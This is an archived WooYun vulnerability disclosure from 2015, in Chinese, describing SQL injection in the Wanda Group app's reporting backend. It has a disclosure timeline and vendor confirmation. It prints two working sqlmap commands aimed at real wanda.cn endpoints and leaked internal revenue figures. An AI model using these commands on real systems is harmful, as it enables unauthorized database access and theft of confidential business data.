WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-095535

漏洞标题：万达集团官网APP云端漫游之sql注入敏感信息泄露

相关厂商：大连万达集团股份有限公司

漏洞作者： zzR

提交时间：2015-02-04 08:56

修复时间：2015-03-21 08:58

公开时间：2015-03-21 08:58

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：15

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签： 无

4人收藏 收藏

分享漏洞：

漏洞详情

披露状态：

2015-02-04： 细节已通知厂商并且等待厂商处理中
2015-02-04： 厂商已经确认，细节仅向厂商公开
2015-02-14： 细节向核心白帽子及相关领域专家公开
2015-02-24： 细节向普通白帽子公开
2015-03-06： 细节向实习白帽子公开
2015-03-21： 细节向公众公开

简要描述：

**某调查显示**：
Mobile app最大的漏洞比例来源于服务端,而非mobile app本身的代码漏洞,比例大约为30%
第2，隐私暴力获取 22%
第3，输入漏洞（数据传输和存储）20%
第4, session 管理 15%
第5，权限不当 13%
---------------------------------------------------------------------------------------
万达集团官网APP云端游来游去，SQL注入、信息泄露涉及集团主要产品。
电影（收入**9万元，你以为是什么，这是卖爆米花一天的收入！）+实时票房、会员
酒店（收入 **,596 万元，你以为是多长时间，一个月！）
KTV（收入 **8.52万元，你以为是多长时间，一天！）
旅游（营业额**1,236万，你以为是多长时间，还是一个月！）
多维度报表，还是好多的都没达标啊！
总结下来还是一句：老公好有钱！！！！！！*我！
---------------------------------------------------------------------------------------

详细说明：

漏洞证明：

电影（收入629万元，你以为是什么，这是卖爆米花一天的收入！）
酒店（收入 47,596 万元，你以为是多长时间，一个月！）
KTV（收入 828.52万元，你以为是多长时间，一天！）
旅游（营业额751,236万，你以为是多长时间，还是一个月！）
多维度报表，还是好多的都没达标啊！

sqlmap.py -u "http://app.wanda.cn/APPREP/tourYeardetailsAction?dimension=2" --current-user --current-db --tamper=between --dbms=mysql

sqlmap.py -u "http://app.wanda.cn/AppReports/hoteldetailsservlet.do?
categorykey=17&hoteltypekey=2&type=0&liorshou=1" --random-agent --current-user --current-db --is dba --dbs --tamper=between --dbms=mysql

修复方案：

版权声明：转载请注明来源 zzR@乌云

漏洞回应